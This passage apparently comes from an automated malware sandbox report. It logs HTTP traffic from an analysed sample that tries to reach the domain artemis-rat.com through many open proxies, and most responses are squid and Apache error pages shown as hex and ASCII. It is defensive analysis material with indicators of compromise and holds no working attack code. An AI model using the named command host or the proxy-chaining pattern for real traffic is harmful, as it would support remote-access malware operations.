content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Sat, 09 Mar 2024 12:14:24 GMTContent-Length: 102Data Raw: 64 69 61 6c 20 74 63 70 3a 20 6c 6f 6f 6b 75 70 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 6f 6e 20 31 2e 31 2e 31 2e 31 3a 35 33 3a 20 72 65 61 64 20 75 64 70 20 31 30 2e 36 34 2e 32 33 38 2e 32 31 36 3a 34 37 30 30 36 2d 3e 31 2e 31 2e 31 2e 31 3a 35 33 3a 20 69 2f 6f 20 74 69 6d 65 6f 75 74 0a Data Ascii: dial tcp: lookup artemis-rat.com on 1.1.1.1:53: read udp 10.64.238.216:47006->1.1.1.1:53: i/o timeout
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/6.0.0-20220501-re899e0c27Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:27 GMTContent-Type: text/html;charset=utf-8Content-Length: 3670X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enCache-Status: ezproxies.comVia: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/6.0.0-20220501-re899e0c27Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:27 GMTContent-Type: text/html;charset=utf-8Content-Length: 3670X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enCache-Status: ezproxies.comVia: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:28 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Sat, 09 Mar 2024 12:14:28 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:28 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/6.0.0-20220501-re899e0c27Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:28 GMTContent-Type: text/html;charset=utf-8Content-Length: 3670X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enCache-Status: ezproxies.comVia: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:28 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 281Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:28 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/6.0.0-20220501-re899e0c27Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:28 GMTContent-Type: text/html;charset=utf-8Content-Length: 3670X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enCache-Status: ezproxies.comVia: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:28 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:28 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:28 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7
                Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service Unavailablex-envoy-overloaded: truecontent-length: 81content-type: text/plaindate: Sat, 09 Mar 2024 11:54:17 GMTserver: svcproxyconnection: closeData Raw: 75 70 73 74 72 65 61 6d 20 63 6f 6e 6e 65 63 74 20 65 72 72 6f 72 20 6f 72 20 64 69 73 63 6f 6e 6e 65 63 74 2f 72 65 73 65 74 20 62 65 66 6f 72 65 20 68 65 61 64 65 72 73 2e 20 72 65 73 65 74 20 72 65 61 73 6f 6e 3a 20 6f 76 65 72 66 6c 6f 77 Data Ascii: upstream connect error or disconnect/reset before headers. reset reason: overflow
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/5.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:29 GMTContent-Type: text/html;charset=utf-8Content-Length: 3628X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from lb1X-Cache-Lookup: NONE from lb1:3128Via: 1.1 lb1 (squid/5.7)Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 